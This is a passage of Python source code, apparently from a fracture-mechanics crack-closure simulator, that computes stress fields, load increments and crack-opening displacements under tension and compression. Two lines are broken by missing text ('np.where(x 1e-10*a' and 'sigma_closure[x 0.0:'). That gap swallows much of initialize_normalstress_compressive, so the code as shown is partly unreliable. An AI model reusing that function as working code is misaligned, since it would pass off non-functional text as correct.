xt1 < xt2 So: Integral = 0 where x < xt1 Integral upper bound = x where xt1 < x < xt2 Integral upper bound = xt2 where x > xt2 indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,upper_bound) - indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,xt1) So our actual solution putting everything together is: 0 where x < xt1 otherwise: upper_bound = min(x, xt2) F*(upper_bound-xt1) + (sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*F)*(indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,upper_bound) - indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x,xt1)) """ # For a mode I tension crack with the tip at the origin, intact material # to the right (x > 0), broken material to the left (x < 0) # The tensile stress @ theta=0 multiplied by sqrt(x)/(sqrt(a)*sigmaext) # where x ( > 0) is the position where the stress is measured, # a is the (half) length of the crack, and sigmaext # is the external tensile load sigmaext2 = sigmaext1 + (xt2-xt1)*F #print("sigmaext1 = %g; sigmaext2=%g; sigmaext_max=%g; xt1=%g; xt2=%g; F=%g" % (sigmaext1,sigmaext2,sigmaext_max,xt1,xt2,F)) use_xt2 = xt2 if sigmaext2 > sigmaext_max: # bound sigmaext by sigmaext_max... by limiting xt2 if F > 0: use_xt2 = xt1 + (sigmaext_max-sigmaext1)/F pass if F==0 or use_xt2 > xt2: use_xt2 = xt2 pass sigmaext2 = sigmaext_max pass #print("use_xt2 = %g" % (use_xt2)) upper_bound = use_xt2*np.ones(x.shape,dtype='d') # alternate upper_bound: use_alternate = x < upper_bound upper_bound[use_alternate] = x[use_alternate] res=np.zeros(x.shape,dtype='d') nonzero = x > xt1 xtavg = (xt1+use_xt2)/2.0 sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = crack_model.eval_sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext(xtavg) # KI/(sigma_ext*sqrt(a)) # evaluated from basic formula: # KI = sigma_ext * sqrt(pi*a) from Suresh # KI/(sigma_ext*sqrt(a)) = sqrt(pi) = 1.77 # KI/(sigma_ext*sqrt(a)) # evaluated via basic weightfunction: # KI/(sigma_ext*sqrt(a)) = (integral of the weightfunction from -a..a)/(sigma_ext*sqrt(a)) # # For basic weightfunction from Fett and Munz: # m = sqrt(1/(pi*a)) * sqrt(a+x)/sqrt(a-x) # This would be: (1/(a*sqrt(pi))) integral_-a^a sqrt(a+x)/sqrt(a-x) dx # let u = x/a; du = dx/a -> dx=a*du # This would be: (1/(a*sqrt(pi))) integral_-1^1 sqrt(a+au)/sqrt(a-au) a*du # This would be: (1/(sqrt(pi))) integral_-1^1 sqrt(1+u)/sqrt(1-u) du # ... = (1/sqrt(pi)) * pi = sqrt(pi) by wolfram alpha ... CHECK! # This is the (integral of the weightfunction from 0..a)/sqrt(2*pi*a) # For basic weightfunction: sqrt(1/(pi*a)) * sqrt(a+x)/sqrt(a-x) # This would be: (1/(a*pi*sqrt(2))) integral_0^a sqrt(a+x)/sqrt(a-x) dx # let u = x/a; du = dx/a -> dx=a*du # This would be: (1/(a*pi*sqrt(2))) integral_0^1 sqrt(a+au)/sqrt(a-au) a*du # This would be: (1/(pi*sqrt(2))) integral_0^1 sqrt(1+u)/sqrt(1-u) du # ... = (2+pi)/(2*pi*sqrt(2))... = .578 by wolfram alpha # ... 
or a factor of (2+pi)/(2*pi)=.818 smaller than the .707 # of the simple formula # old version that fails load balance #res[nonzero] = F*(upper_bound[nonzero]-xt1) + (sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*F) * (indef_integral_of_simple_squareroot_quotients(x[nonzero],upper_bound[nonzero]) - indef_integral_of_simple_squareroot_quotients(x[nonzero],xt1)) res[nonzero] = F*(upper_bound[nonzero]-xt1) + (sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*F) * (indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x[nonzero],upper_bound[nonzero]) - indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x[nonzero],xt1)) return (use_xt2,sigmaext2,res) def integral_compressivestress_shrinking_effective_crack_length_byxt(x,sigmaext1,sigmaext_max,F,xt1,xt2,crack_model): """ Like integral_tensilestress_growing_effective_crack_length_byxt() but for compression. """ # sigmaext1 is starting load (negative for compression) # sigmaext_max is limit load (negative for compression) # sigmaext2 is the ending load (negative for compression, # more negative than sigmaext1 # For a mode I tension crack with the tip at the origin, intact material # to the right (x > 0), broken material to the left (x < 0) # The tensile stress @ theta=0 multiplied by sqrt(x)/(sqrt(a)*sigmaext) # where x ( > 0) is the position where the stress is measured, # a is the (half) length of the crack, and sigmaext # is the external tensile load # ... F is positive sigmaext2 = sigmaext1 - (xt2-xt1)*F #print("sigmaext1 = %g; sigmaext2=%g; sigmaext_max=%g; xt1=%g; xt2=%g; F=%g" % (sigmaext1,sigmaext2,sigmaext_max,xt1,xt2,F)) use_xt1 = xt1 if sigmaext2 < sigmaext_max: # bound sigmaext by sigmaext_max... by limiting xt1 if F > 0: use_xt1 = xt2 + (sigmaext_max-sigmaext1)/F pass if F==0 or use_xt1 < xt1: use_xt1 = xt1 pass sigmaext2 = sigmaext_max pass #print("use_xt1 = %g" % (use_xt1)) upper_bound = xt2*np.ones(x.shape,dtype='d') nonzero = x > use_xt1 # alternate upper_bound: use_alternate = x < upper_bound upper_bound[use_alternate] = x[use_alternate] res=np.zeros(x.shape,dtype='d') xtavg = (use_xt1+xt2)/2.0 sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = crack_model.eval_sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext(xtavg) # KI/(sigma_ext*sqrt(a)) # evaluated from basic formula: # KI = sigma_ext * sqrt(pi*a) from Suresh # KI/(sigma_ext*sqrt(a)) = sqrt(pi) = 1.77 # KI/(sigma_ext*sqrt(a)) # evaluated via basic weightfunction: # KI/(sigma_ext*sqrt(a)) = (integral of the weightfunction from -a..a)/(sigma_ext*sqrt(a)) # # For basic weightfunction from Fett and Munz: # m = sqrt(1/(pi*a)) * sqrt(a+x)/sqrt(a-x) # This would be: (1/(a*sqrt(pi))) integral_-a^a sqrt(a+x)/sqrt(a-x) dx # let u = x/a; du = dx/a -> dx=a*du # This would be: (1/(a*sqrt(pi))) integral_-1^1 sqrt(a+au)/sqrt(a-au) a*du # This would be: (1/(sqrt(pi))) integral_-1^1 sqrt(1+u)/sqrt(1-u) du # ... = (1/sqrt(pi)) * pi = sqrt(pi) by wolfram alpha ... CHECK! # This is the (integral of the weightfunction from 0..a)/sqrt(2*pi*a) # For basic weightfunction: sqrt(1/(pi*a)) * sqrt(a+x)/sqrt(a-x) # This would be: (1/(a*pi*sqrt(2))) integral_0^a sqrt(a+x)/sqrt(a-x) dx # let u = x/a; du = dx/a -> dx=a*du # This would be: (1/(a*pi*sqrt(2))) integral_0^1 sqrt(a+au)/sqrt(a-au) a*du # This would be: (1/(pi*sqrt(2))) integral_0^1 sqrt(1+u)/sqrt(1-u) du # ... = (2+pi)/(2*pi*sqrt(2))... = .578 by wolfram alpha # ... 
or a factor of (2+pi)/(2*pi)=.818 smaller than the .707 # of the simple formula # old version that fails load balance #res[nonzero] = -F*(upper_bound[nonzero]-use_xt1) - (sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*F) * (indef_integral_of_simple_squareroot_quotients(x[nonzero],upper_bound[nonzero]) - indef_integral_of_simple_squareroot_quotients(x[nonzero],use_xt1)) res[nonzero] = -F*(upper_bound[nonzero]-use_xt1) - (sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*F) * (indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x[nonzero],upper_bound[nonzero]) - indef_integral_of_crack_tip_singularity_times_1_over_r2_pos_crossterm_decay(crack_model,x[nonzero],use_xt1)) return (use_xt1,sigmaext2,res) def solve_incremental_tensilestress(x,x_bnd,sigma,sigma_closure,tensile_displ,xt_idx,dx,sigmaext,sigmaext_max,a,crack_model,calculate_displacements=True): """The overall crack opening constraint is that (tensile load on crack surface) > 0 to open For a through-crack of thickness h, short segment of width dx sigma*h*dx - sigma_closure*h*dx > 0 (where sigma represents the total local stress field increment due to the external load and sigma_closure represents the closure stresses prior to such increment (positive for compression)) or equivalently sigma > sigma_closure (where sigma_closure is positive (i.e. compressive)) Consider an increment in position dx. Assume from previous steps we have a superimposed sigma(x) in the plane of the crack. In this step we are adding an increment to sigma_external. Stresses accumulate strictly to the right of the effective tip. The rule for the crack to remain closed is that (the preexisting sigma(x) + the increment in sigma(x)) <= sigma_closure Here, given the preexisting sigma(x), sigma_closure(x), and an increment of opening the crack by one unit of dx, we are evaluating the increment in sigma(x) as well as the increment in sigma_external We can evaluate the increment in sigma from: (use_xt2,sigmaext2,sigma_increment)=integral_tensilestress_growing_effective_crack_length_byxt(x,sigmaext,sigmaext_max,F,x[xt_idx],x[xt_idx+1],weightfun_times_sqrt_aminx,weightfun_epsx) But to do this we need to solve for F. We do this by setting the tensile normal stress equal to the closure stress over the new step (unit of dx). """ next_bound = x_bnd[xt_idx+1] if next_bound > a: next_bound=a pass def obj_fcn(F): (use_xt2,sigmaext2,sigma_increment)=integral_tensilestress_growing_effective_crack_length_byxt(x,sigmaext,np.inf,F,x_bnd[xt_idx],next_bound,crack_model) #print("obj_fcn return %g" % ((sigma+sigma_increment - sigma_closure)[xt_idx])) return (sigma+sigma_increment - sigma_closure)[xt_idx] # F measures the closure gradient in (Pascals external tensile stress / meters of tip motion) if sigma_closure[xt_idx] >= 0.0 and sigma[xt_idx] < sigma_closure[xt_idx]: # There is a closure stress here but not yet the full external tensile load to counterbalance it # !!!*** Can shortcut most of this calculation in 99% of cases # by solving directly for F under assumption that delta sigma infinity # will not exceed our limit. Then the code below would only # be needed for the rare case that we are reaching our load limit # and cannot actually open crack up to next increment # ***!!! 
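# A hedged standalone sketch (not part of this solver): the root-finding
# pattern used below grows an upper bracket Fbnd by doubling until the
# objective changes sign, then hands the bracket [0, Fbnd] to
# scipy.optimize.brentq.  _bracket_and_solve and its obj argument are
# hypothetical names introduced only for this illustration; in the real code
# obj_fcn is built from integral_tensilestress_growing_effective_crack_length_byxt().
def _bracket_and_solve(obj, Fguess):
    import scipy.optimize
    Fbnd = Fguess
    while Fbnd != 0.0 and obj(Fbnd) < 0.0:
        Fbnd *= 2.0  # double the bracket until the objective goes positive
    if Fbnd == 0.0 or obj(Fbnd) <= 0.0:
        return Fbnd  # cannot bracket a sign change; best achievable slope
    return scipy.optimize.brentq(obj, 0.0, Fbnd)
# For example, _bracket_and_solve(lambda F: F - 3.0, 1.0) returns 3.0.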
# Bound it by 0 and the F that will give the maximum # contribution of sigma_increment: 2.0*(sigmaext_max-sigmaext1)/(xt2-xt1) if np.isinf(sigmaext_max): if sigmaext != 0.0: Fbnd = 2.0*(sigmaext)/(next_bound-x_bnd[xt_idx]) pass else: Fbnd = 2.0*(20e6)/(next_bound-x_bnd[xt_idx]) pass pass else: Fbnd = 2.0*(sigmaext_max - sigmaext)/(next_bound-x_bnd[xt_idx]) pass # Increase Fbnd until we get a positive result from obj_fcn while Fbnd != 0.0 and obj_fcn(Fbnd) < 0.0: Fbnd*=2.0; pass # Condition below should only occur when Fbnd==0.0, i.e. when sigmaext_max==sigmaext, or if the objective is already satisfied if Fbnd == 0.0 or obj_fcn(Fbnd) <= 0.0: # Maximum value of objective is < 0... This means that # with the steepest sigma vs. xt slope possible (given # the total tensile load we are applying) we still # can't get sigma+sigma_increment to match sigma_closure. # ... We will have to make do with sigma+sigma_increment # < sigma_closure # So our best result is just Fbnd F=Fbnd #print("obj_fcn(Fbnd) returns %g; obj_fcn(200*Fbnd) returns %g" % (obj_fcn(Fbnd),obj_fcn(200*Fbnd))) pass else: # brentq requires function to be different signs # at 0.0 (negative) and Fbnd (positive) F = scipy.optimize.brentq(obj_fcn,0.0,Fbnd,disp=True) pass (use_xt2,sigmaext2,sigma_increment)=integral_tensilestress_growing_effective_crack_length_byxt(x,sigmaext,sigmaext_max,F,x_bnd[xt_idx],next_bound,crack_model) #print("F=%g" % (F)) #print("use_xt2=%f" % (use_xt2)) assert(use_xt2 <= a) # For displacement calculate at x centers... use average of left and right boundaries, except for (perhaps) last point where instead of the right boundary we use the actual tip. if calculate_displacements: incremental_displacement = np.zeros(x.shape[0],dtype='d') xt = (x_bnd[xt_idx]+use_xt2)/2.0 left_of_effective_tip = (x < xt) incremental_displacement[left_of_effective_tip] = tensile_displacement(sigmaext2-sigmaext,x[left_of_effective_tip],xt,crack_model) pass pass else: # No closure stress at this point, or sigma is already at the limit # of what can be supported here # ... 
just open up to the next spot use_xt2 = x_bnd[xt_idx+1] if use_xt2 > a: # Cannot open beyond tips use_xt2 = a pass sigmaext2 = sigmaext sigma_increment = np.zeros(x.shape[0],dtype='d') incremental_displacement = np.zeros(x.shape[0],dtype='d') pass if calculate_displacements: ret_displ = tensile_displ+incremental_displacement pass else: ret_displ=None pass dsigmaext_dxt = (sigmaext2-sigmaext)/(x_bnd[xt_idx+1]-x_bnd[xt_idx]) #print("dsigmaext_dxt=%g" % (dsigmaext_dxt)) return (use_xt2,sigmaext2, sigma+sigma_increment, ret_displ, dsigmaext_dxt) def solve_incremental_compressivestress(x,x_bnd,sigma,sigma_closure,tensile_displ,use_xt2,xt_idx,dx,sigmaext,sigmaext_max,a,sigma_yield,crack_model,calculate_displacements=True): """Like solve_incremental_tensilestress but for negative sigmaext and sigmaext_max """ next_bound = x_bnd[xt_idx] if next_bound < 0.0: next_bound=0.0 pass def obj_fcn(F): (use_xt1,sigmaext2,sigma_increment)=integral_compressivestress_shrinking_effective_crack_length_byxt(x,sigmaext,-np.inf,F,next_bound,use_xt2,crack_model) #print("obj_fcn return %g" % ((sigma+sigma_increment - sigma_closure)[xt_idx])) return (sigma+sigma_increment - sigma_closure)[xt_idx] #if use_xt2 >= 1.43216e-3 and use_xt2 <= 1.4572e-3: # print("Problem spot!") # sys.modules["__main__"].__dict__.update(globals()) # sys.modules["__main__"].__dict__.update(locals()) # raise ValueError("Problem") # pass # F measures the closure gradient in (Pascals external tensile stress / meters of tip motion) if sigma_closure[xt_idx] <= 0.0 and sigma[xt_idx] > sigma_closure[xt_idx]: # There is not the full external compressive load to close the crack here... # Bound it by 0 and the F that will give the maximum # contribution of sigma_increment: 2.0*(sigmaext_max-sigmaext1)/(xt2-xt1) # (F is positive, in general... next_bound is smaller than use_xt2) if np.isinf(sigmaext_max): # sigmaext_max is -inf when we are closing the crack all the way to find out opening displacement Fbnd = 2.0*(-sigma_yield)/(next_bound-use_xt2) pass else: Fbnd = 2.0*(sigmaext_max - sigmaext)/(next_bound-use_xt2) pass # Increase Fbnd until we get a negative result from obj_fcn while Fbnd != 0.0 and obj_fcn(Fbnd) > 0.0: Fbnd*=2.0; pass # Condition below should only occur when Fbnd==0.0, i.e. when sigmaext_max==sigmaext, or if the objective is already satisfied if Fbnd ==0.0 or obj_fcn(Fbnd) >= 0.0: # Maximum value of objective is < 0... This means that # with the steepest sigma vs. xt slope possible (given # the total tensile load we are applying) we still # can't get sigma+sigma_increment to match sigma_closure. # ... We will have to make do with sigma+sigma_increment # < sigma_closure # So our best result is just Fbnd F=Fbnd #print("obj_fcn(Fbnd) returns %g; obj_fcn(200*Fbnd) returns %g" % (obj_fcn(Fbnd),obj_fcn(200*Fbnd))) pass else: # brentq requires function to be different signs # at 0.0 (negative) and Fbnd (positive) F = scipy.optimize.brentq(obj_fcn,0.0,Fbnd,disp=True) pass (use_xt1,sigmaext2,sigma_increment)=integral_compressivestress_shrinking_effective_crack_length_byxt(x,sigmaext,sigmaext_max,F,next_bound,use_xt2,crack_model) #print("use_xt1=%f" % (use_xt1)) assert(use_xt1 >= 0.0) # For displacement calculate at x centers... use average of left and right boundaries, except for (perhaps) last point where instead of the right boundary we use the actual tip. 
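# Hedged sign check with toy numbers (not from any real model): under
# compression sigmaext_max is more negative than sigmaext and next_bound is
# smaller than use_xt2, so the Fbnd expression above stays positive, e.g.
#   sigmaext = -10e6 Pa, sigmaext_max = -50e6 Pa,
#   next_bound = 1.0e-3 m, use_xt2 = 1.5e-3 m
#   Fbnd = 2.0*(-50e6 - (-10e6))/(1.0e-3 - 1.5e-3) = 2.0*(-40e6)/(-0.5e-3) = 1.6e11 Pa/m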
if calculate_displacements: incremental_displacement = np.zeros(x.shape[0],dtype='d') xt = (use_xt1+use_xt2)/2.0 left_of_effective_tip = (x < xt) incremental_displacement[left_of_effective_tip] = tensile_displacement(sigmaext2-sigmaext,x[left_of_effective_tip],xt,crack_model) pass pass else: # This region has enough stress to close # ... just close it up to the next spot use_xt1 = next_bound if use_xt1 < 0.0: # Cannot close beyond the center use_xt1 = 0.0 pass sigmaext2 = sigmaext sigma_increment = np.zeros(x.shape[0],dtype='d') incremental_displacement = np.zeros(x.shape[0],dtype='d') pass if calculate_displacements: ret_displ = tensile_displ+incremental_displacement pass else: ret_displ=None pass # Limit compressive stresses at physical tip (and elsewhere) to yield sigma_increment[sigma + sigma_increment < -sigma_yield] = -sigma_yield-sigma[sigma+sigma_increment < -sigma_yield] #assert((sigma+sigma_increment <= 0.0).all()) dsigmaext_dxt = (sigmaext2-sigmaext)/(x_bnd[xt_idx+1]-x_bnd[xt_idx]) return (use_xt1,sigmaext2, sigma+sigma_increment, ret_displ,dsigmaext_dxt) #####TENSILE DISPLACEMENT FUNCTION def tensile_displacement(sigma_applied,x,xt,crack_model): ##plane stress is considered u = crack_model.eval_ModeI_COD_per_unit_stress_vectorized(x,xt)*sigma_applied #if (xt > 1e-3): # sys.modules["__main__"].__dict__.update(globals()) # sys.modules["__main__"].__dict__.update(locals()) # raise ValueError("xt exceeds 1mm") return u def solve_normalstress_tensile(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,verbose=False, diag_plots=False,calculate_displacements=True): #Initialize the external applied tensile stress starting at zero sigmaext = 0.0 # External tensile load in this step (Pa) #if sigmaext_max==0.0: # sys.modules["__main__"].__dict__.update(globals()) # sys.modules["__main__"].__dict__.update(locals()) # raise ValueError("Zero external load") #####MAIN SUPERPOSITION LOOP #Initialize tensile stress field (function of x) sigma = np.zeros(x.shape,dtype='d') #Initialized the Displacement state as zero if calculate_displacements: tensile_displ = np.zeros(x.shape,dtype='d') pass else: tensile_displ = None pass #Initialize x step counter xt_idx = 0 use_xt2=0.0 # Before opening, sigma just increases uniformly # (Note: stress distribution may not be very accurate if # initial opening does not occur @ x=0) argmin_sigma_closure = np.argmin(sigma_closure[x < a]) min_sigma_closure=sigma_closure[x < a][argmin_sigma_closure] if min_sigma_closure > 0: # We can hold a compressive stress of min_sigma_closure # without any opening at all. uniform_tension = np.min((min_sigma_closure,sigmaext_max)) sigma += uniform_tension sigmaext += uniform_tension # assume anything to the left of the # sigma_closure minimum is open # once we get to this point #xt_idx=argmin_sigma_closure #assert(xt_idx==0) # for now, do not yet handle cases where crack starts peeling open anywhere but the center xt_idx=0 use_xt_start=x_bnd[xt_idx] use_xt2 = use_xt_start pass elif min_sigma_closure <= 0: # There is an opening point... 
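# Hedged toy example of the sign-change search performed just below (numbers
# are arbitrary): for a closure profile sc = np.array([-2., -1., 0., 3., 5.]) (MPa),
#   np.where((sc[:-1] <= 0.0) & (sc[1:] > 0.0))[0]  ->  array([2])
# i.e. the profile crosses from tensile/zero to compressive closure between
# elements 2 and 3, and index 2 is what the search returns.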
# Find where sigma_closure goes from negative (tensile) # to positive (compressive) signchange_idxs = np.where((sigma_closure[x < a][:-1] <= 0.0) & (sigma_closure[x < a][1:] > 0.0))[0] if signchange_idxs.shape[0] > 0: xt_idx=signchange_idxs[0] if x_bnd[xt_idx+1] < a: closure_slope=(sigma_closure[xt_idx+2]-sigma_closure[xt_idx+1])/dx pass else: closure_slope=(sigma_closure[xt_idx+1]-sigma_closure[xt_idx])/dx pass assert(closure_slope > 0.0) # Project tip position backwards from x[signchange_idxs+1] use_xt_start=x[xt_idx+1]-sigma_closure[xt_idx+1]/closure_slope use_xt2 = use_xt_start pass else: # No signchange if (sigma_closure[x < a] > 0.0).any(): # have compressive (positive) closure stresses, but no signchange # ... crack must be fully closed xt_idx=0 use_xt_start=0.0 use_xt2=0.0 pass else: # crack must be fully open xt_idx = np.where(x < a)[0][-1] # open all the way to tip # if closure stress is tensile everywhere use_xt_start = a use_xt2 = a pass pass ## Use the rightmost opening point (closest to physical tip) #xt_idx=xt_idxs[-1] # #if (sigma_closure[:xt_idx] > 0.0).any(): # sys.modules["__main__"].__dict__.update(globals()) # sys.modules["__main__"].__dict__.update(locals()) # raise ValueError("foo!") # sys.stderr.write("crackclosuresim2.crackclosure.solve_normalstress_tensile(): WARNING: Multiple opening points!\n") # pass pass else: assert(0) # shouldn't be possible pass done=False dsigmaext_dxt = np.ones(x.shape,dtype='d')*np.nan # dsigmaext_dxt is a measure of the distributed stress concentration while not done and sigmaext < sigmaext_max: (use_xt2,sigmaext, sigma, tensile_displ, dsigmaext_dxt[xt_idx]) = solve_incremental_tensilestress(x,x_bnd,sigma,sigma_closure,tensile_displ,xt_idx,dx,sigmaext,sigmaext_max,a,crack_model,calculate_displacements=calculate_displacements) if use_xt2 < x_bnd[xt_idx+1] or sigmaext==sigmaext_max or use_xt2 >= a: # Used up all of our applied load or all of our crack... Done! done=True pass if verbose: #Print what is happening in the loop print("Step: %d @ x=%f mm: %f MPa of tension held" % (xt_idx,x[xt_idx]*1e3,sigmaext/1e6)) if calculate_displacements: print("Tensile displacement @ x=%f mm: %f nm" % (x[0]*1e3, tensile_displ[0]*1e9)) pass pass if not done: # loop back xt_idx+=1 pass pass if sigmaext < sigmaext_max and not np.isinf(sigmaext_max): # We opened the crack to the tips without providing # the full external load. # Now the effective tip is the physical tip (at a) # # ...
Apply the remaining load increment assert(use_xt2 == a) sigma_increment = np.zeros(x.shape[0],dtype='d') si_nodivzero_nonegsqrt = x-a > 1e-10*a si_divzero = (x-a >= 0) & ~si_nodivzero_nonegsqrt #sigma_increment = sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*(sigmaext_max-sigmaext)*sqrt(a)/sqrt(x-a) sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = crack_model.eval_sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext(a) # New (sigmaext_max - sigmaext) term is the incremental external stress field beyond the tips added in addition to the stress contcentration effect sigma_increment[si_nodivzero_nonegsqrt] = (sigmaext_max - sigmaext) + sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*(sigmaext_max-sigmaext)*sqrt(a)/sqrt(x[si_nodivzero_nonegsqrt]-a) sigma_increment[si_divzero]=np.inf # Limit tensile stresses at physical tip (and elsewhere) to yield sigma_increment[sigma + sigma_increment > sigma_yield] = sigma_yield-sigma[sigma+sigma_increment > sigma_yield] # accumulate stresses onto sigma sigma += sigma_increment # record increment in displacement left_of_effective_tip = x < a if calculate_displacements: tensile_displ[left_of_effective_tip] += tensile_displacement(sigmaext_max-sigmaext,x[left_of_effective_tip],a,crack_model) pass # Record increment in sigmaext sigmaext = sigmaext_max if verbose: print("Step: Open to tips @ x=%f mm: %f MPa of tension held" % (a*1e3,sigmaext/1e6)) if calculate_displacements: print("Tensile displacement @ x=%f mm: %f nm" % (x[0]*1e3, tensile_displ[0]*1e9)) pass pass pass sigma_with_sigma_closure=sigma-sigma_closure*(x > use_xt_start)*(x <= a) # sigma_closure only contributes after where we started peeling it open return (use_xt2, sigma_with_sigma_closure, tensile_displ, dsigmaext_dxt) def initialize_normalstress_compressive(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,calculate_displacements): #Initialize the external applied compressive stress (sigmaext_max negative) starting at zero sigmaext = 0.0 # External tensile load in this step (Pa) #Initialize tensile stress field (function of x) sigma = np.zeros(x.shape,dtype='d') #Initialized the Displacement state as zero if calculate_displacements: tensile_displ = np.zeros(x.shape,dtype='d') pass else: tensile_displ = None pass #Initialize x step counter xt_idx = np.where(x 1e-10*a si_divzero = (x-a >= 0) & ~si_nodivzero_nonegsqrt sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = crack_model.eval_sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext(a) # New (sigmaext_max - sigmaext) term is the incremental external stress field beyond the tips added in addition to the stress contcentration effect sigma_increment[si_nodivzero_nonegsqrt] = (fullyopen_compression) + sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext*(fullyopen_compression)*sqrt(a)/sqrt(x[si_nodivzero_nonegsqrt]-a) sigma_increment[si_divzero]=-np.inf # Limit compressive stresses at physical tip (and elsewhere) to yield sigma_increment[sigma + sigma_increment < -sigma_yield] = -sigma_yield-sigma[sigma+sigma_increment < -sigma_yield] # accumulate stresses onto sigma sigma += sigma_increment # record increment in displacement left_of_effective_tip = x < a if calculate_displacements: tensile_displ[left_of_effective_tip] += tensile_displacement(fullyopen_compression,x[left_of_effective_tip],a,crack_model) pass # Record increment in sigmaext sigmaext = fullyopen_compression if verbose: print("Step: Crack open to tip: %f MPa of compression held with no closure" % (-fullyopen_compression/1e6)) if calculate_displacements: 
print("Tensile displacement @ x=%f mm: %f nm" % (x[0]*1e3, tensile_displ[0]*1e9)) pass pass pass elif max_sigma_closure >= 0: # There are closure stresses (positive compression) somewhere # Find where sigma_closure goes from negative (tensile) # to positive (compressive) signchange_idxs = np.where((sigma_closure[x < a][:-1] <= 0.0) & (sigma_closure[x < a][1:] > 0.0))[0] if signchange_idxs.shape[0] > 0: xt_idx=signchange_idxs[0] if x_bnd[xt_idx+1] < a: closure_slope=(sigma_closure[xt_idx+2]-sigma_closure[xt_idx+1])/dx pass else: closure_slope=(sigma_closure[xt_idx+1]-sigma_closure[xt_idx])/dx pass assert(closure_slope > 0.0) # Project tip position backwards from x[signchange_idxs+1] use_xt2=x[xt_idx+1]-sigma_closure[xt_idx+1]/closure_slope use_xt1 = use_xt2 pass else: # No signchange if sigma_closure[x 0.0: # have compressive (positive) closure stresses, but no signchange # ... crack must be fully closed xt_idx=0 use_xt2=0.0 use_xt1=0.0 pass else: # crack must be fully open xt_idx = np.where(x < a)[0][-1] # open all the way to tip # if closure stress is tensile everywhere use_xt2=a use_xt1=a #x_bnd[xt_idx] pass pass pass else: assert(0) # Shouldn't be possible pass return (sigmaext,sigma,tensile_displ,xt_idx,use_xt2,use_xt1) def tensile_closure_from_crackopening(x,x_bnd,sigma_closure,crackopening,dx,a,sigma_yield,crack_model): """ Interpret a (possibly partly or fully) tensile closure field from a compressive closure field and a crack (half) opening displacement field. Note that this uses the half-opening not the full-opening used in softclosure.py Note that the closure field with opening displacement field representation limits us to effective tips that lie on grid boundaries whereas the tensile closure field can place the effective tip (opening point) anywhere. 
Note: first point of returned tensile closure will always be zero """ assert(not(((crackopening > 0.0) & (sigma_closure > 0.0)).any())) # no closure stress where crack is open assert((sigma_closure >= 0.0).all()) # no tensile closure stress positive_closure_indexes = np.where(sigma_closure > 0.0)[0] if positive_closure_indexes[0]==0: assert((crackopening == 0.0).all()) return sigma_closure # crack is entirely closed, so tensile_closure is just sigma_closure if positive_closure_indexes.shape[0]==0: # crack is entirely open xt_idx = x_bnd.shape[0]-2 pass else: xt_idx = positive_closure_indexes[0]-1 pass # xt_idx is index into x_bnd indicating start of last element that is open # also equiavlently index into x for last element that is open # also equivalently index into sigma_closure for that element or crackopening for that element (should be zero) assert((sigma_closure[xt_idx:] >= 0.0).all()) assert((crackopening[xt_idx:]==0.0).all()) sigma = np.zeros(x.shape[0],dtype='d') # stress field we are accumulating (positive tensile) that superimposes with the positive compressive sigma_closure tensile_displ = copy.deepcopy(crackopening) sigmaext = 0.0 sigmaext_max = -np.inf # Now try closing the crack one step at a time tensile_closure = copy.deepcopy(sigma_closure) while xt_idx >= 1: use_xt2 = x_bnd[xt_idx+1] # use_xt2 is the starting tip position for this compressive step use_xt1 = x_bnd[xt_idx] # use_xt1 is the ending tip position for this compressive step # use_xt2 and use_xt2 bound the element at x[xt_idx] # There is no substantial COD (just infinitesimal) of this element as the crack closes from use_xt2 to use_xt1 # So we calculate the "tensile closure" on this region to close the element to its left, centered at x[xt_idx-1] #(use_xt1,sigmaext, sigma, tensile_displ, dsigmaext_dxt) = solve_incremental_compressivestress(x,x_bnd,sigma,sigma_closure,tensile_displ,use_xt2,xt_idx,dx,sigmaext,sigmaext_max,a,sigma_yield,crack_model,calculate_displacements=True) # calculate as in tensile_displacement() to get an incremental displacement that zeros the displacement in this region... # Determine sigmaext2-sigmaext on this basis... # # Solving objective function... our given sigma_closure at xt_idx must be zero # # but the sigma_closure in the objective function should be the tensile closure. # # whereas sigmaext2 is now given # Since sigmaext2 = sigmaext1 - (xt2-xt1)*F # then F = -(sigmaext2-sigmaext1)/(xt2-xt1) # ... So we don't need to solve with the objective function. # ... We can call integral_compressivestress_shrinking_effective_crack_length_byxt(x,sigmaext1,sigmaext_max,F,xt1,xt2,crack_model) # to obtain sigma_increment # at position xt_idx, per the objective function, sigma+sigma_increment-sigma_closure == 0 # where sigma_closure is our tensile closure field. # So we can now calculate the tensile closure field value at this position. # Then accumulate sigma into sigma_increment, add in calculated displacement field # (which should almost exactly zero out displacement at this position), # and repeat. du_dsigma = crack_model.u_per_unit_stress(crack_model,x[xt_idx-1],x[xt_idx]) # Displacement of x[xt_idx-1] with effective tip at x[xt_idx] # delta_sigma_ext is negative... 
